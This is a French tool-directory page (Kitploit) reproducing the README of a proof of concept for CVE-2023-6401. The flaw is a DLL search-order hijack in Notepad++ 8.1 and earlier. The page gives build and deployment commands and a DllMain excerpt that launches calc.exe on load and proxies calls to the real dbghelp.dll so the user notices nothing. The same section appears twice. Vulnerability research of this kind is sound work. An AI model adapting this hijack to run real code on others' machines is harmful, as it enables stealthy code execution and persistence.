Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-6401 — CVE-2023-6401 est une vulnérabilité de détournement de DLL qui permet aux attaquants d'exécuter du code arbitraire en plaçant un fichier `dbghelp.dll` malveillant dans le répertoire de l'application. Ce projet démontre la vulnérabilité et fournit un PoC reproductible. | Kitploit
Outils/GitHubGitHub/mekitoci/cve-2023-6401
Analyse des VulnérabilitésExploitationApprentissage et ÉducationDéveloppement de Charges UtilesExploitation de Binaires
GitHubmekitoci/cve-2023-6401

CVE-2023-6401

CVE-2023-6401 est une vulnérabilité de détournement de DLL qui permet aux attaquants d'exécuter du code arbitraire en plaçant un fichier `dbghelp.dll` malveillant dans le répertoire de l'application. Ce projet démontre la vulnérabilité et fournit un PoC reproductible.

Voir le dépôt
17il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-6401 · Preuve de concept de détournement de DLL

License Platform

Anglais | Chinois


Chinois

⚠️ Avertissement important : réservé à des fins de recherche en sécurité et d’éducation

Preuve de concept de la vulnérabilité de détournement de DLL dans NotePad++ ≤ 8.1. Exécution de code arbitraire en plaçant une dbghelp.dll malveillante dans le répertoire de l’application.

Démarrage rapide

root@kitploit:~
# Télécharger le projet
git clone https://github.com/mekitoci/CVE-2023-6401.git

# Se rendre dans le répertoire du projet
cd CVE-2023-6401-main

# Compiler la DLL
# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# Déployer dans le répertoire de NotePad++
copy dbghelp.dll "C:\Program Files\Notepad++\"

# Exécuter le test
"C:\Program Files\Notepad++\notepad++.exe"

# Nettoyage immédiat
del "C:\Program Files\Notepad++\dbghelp.dll"

Résultat attendu : La calculatrice s’affiche + boîte de message + NotePad++ démarre normalement

Résultat PoC

Détails de la vulnérabilité

ÉlémentDétails
Numéro CVECVE-2023-6401
Versions affectéesNotePad++ ≤ 8.1
Type de vulnérabilitéDétournement de DLL / Détournement d’ordre de recherche
ImpactExécution de code arbitraire
PrérequisPermissions d’écriture dans le répertoire de l’application

Principe

Windows charge les DLL dans l’ordre suivant :

  1. Répertoire de l’application (priorité la plus haute)
  2. Répertoire System32
  3. Répertoire Windows
  4. Répertoire courant
  5. Variable d’environnement PATH

NotePad++ charge dbghelp.dll au démarrage. En plaçant une DLL malveillante du même nom dans le répertoire de l’application, le code peut être exécuté avant le chargement de la DLL système.

Implémentation technique

Code central

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Exécution du code malveillant
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // Chargement de la vraie DLL et redirection des appels API
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

Caractéristiques principales

  • Détournement d’ordre de recherche : Exploitation du mécanisme de recherche de DLL de Windows
  • Redirection d’API : Chargement de la vraie DLL et redirection des appels de fonctions pour maintenir le fonctionnement normal de l’application
  • Discrétion : L’utilisateur ne remarque rien d’anormal

Options de compilation

MinGW (recommandé)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

Nettoyage

root@kitploit:~
# Supprimer la DLL malveillante
del "C:\Program Files\Notepad++\dbghelp.dll"

# Vérifier la suppression
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "Nettoyage terminé"

Références

  • CVE-2023-6401
  • Ordre de recherche des DLL Microsoft
  • MITRE ATT&CK T1574.001

Avertissement

Ce projet est destiné uniquement à des fins éducatives et de recherche en sécurité. L’utilisateur est seul responsable du respect des lois et réglementations applicables.


Anglais

⚠️ AVERTISSEMENT IMPORTANT : réservé à des fins de recherche en sécurité et d’éducation

Preuve de concept de la vulnérabilité de détournement de DLL dans NotePad++ ≤ 8.1. Exécution de code arbitraire en plaçant une dbghelp.dll malveillante dans le répertoire de l’application.

Démarrage rapide

root@kitploit:~
# Cloner le projet
git clone https://github.com/mekitoci/CVE-2023-6401.git

# Aller dans le répertoire du projet
cd CVE-2023-6401-main

# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# Déployer dans le répertoire de NotePad++
copy dbghelp.dll "C:\Program Files\Notepad++\"

# Exécuter le test
"C:\Program Files\Notepad++\notepad++.exe"

# Nettoyage immédiat
del "C:\Program Files\Notepad++\dbghelp.dll"

Résultat attendu : La calculatrice s’affiche + boîte de message + NotePad++ démarre normalement

Résultat PoC

Détails de la vulnérabilité

ÉlémentDétails
Numéro CVECVE-2023-6401
Versions affectéesNotePad++ ≤ 8.1
Type de vulnérabilitéDétournement de DLL / Détournement d’ordre de recherche
ImpactExécution de code arbitraire
PrérequisPermissions d’écriture dans le répertoire de l’application

Mécanisme

Windows charge les DLL dans l’ordre suivant :

  1. Répertoire de l’application (priorité la plus haute)
  2. Répertoire System32
  3. Répertoire Windows
  4. Répertoire courant
  5. Variable d’environnement PATH

NotePad++ charge dbghelp.dll au démarrage. En plaçant une DLL malveillante du même nom dans le répertoire de l’application, le code peut être exécuté avant le chargement de la DLL système.

Implémentation technique

Code central

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Exécution du code malveillant
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // Chargement de la vraie DLL et redirection des appels API
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

Caractéristiques principales

  • Détournement d’ordre de recherche : Exploitation du mécanisme de recherche de DLL de Windows
  • Redirection d’API : Chargement de la vraie DLL et redirection des appels de fonctions pour maintenir le fonctionnement normal de l’application
  • Discrétion : L’utilisateur ne remarque rien d’anormal

Options de compilation

MinGW (recommandé)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

Nettoyage

root@kitploit:~
# Supprimer la DLL malveillante
del "C:\Program Files\Notepad++\dbghelp.dll"

# Vérifier la suppression
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "Nettoyage terminé"

Références

  • CVE-2023-6401
  • Ordre de recherche des DLL Microsoft
  • MITRE ATT&CK T1574.001

Avertissement

Ce projet est destiné uniquement à des fins éducatives et de recherche en sécurité. L’utilisateur est seul responsable du respect des lois et réglementations applicables.

Télécharger l’outil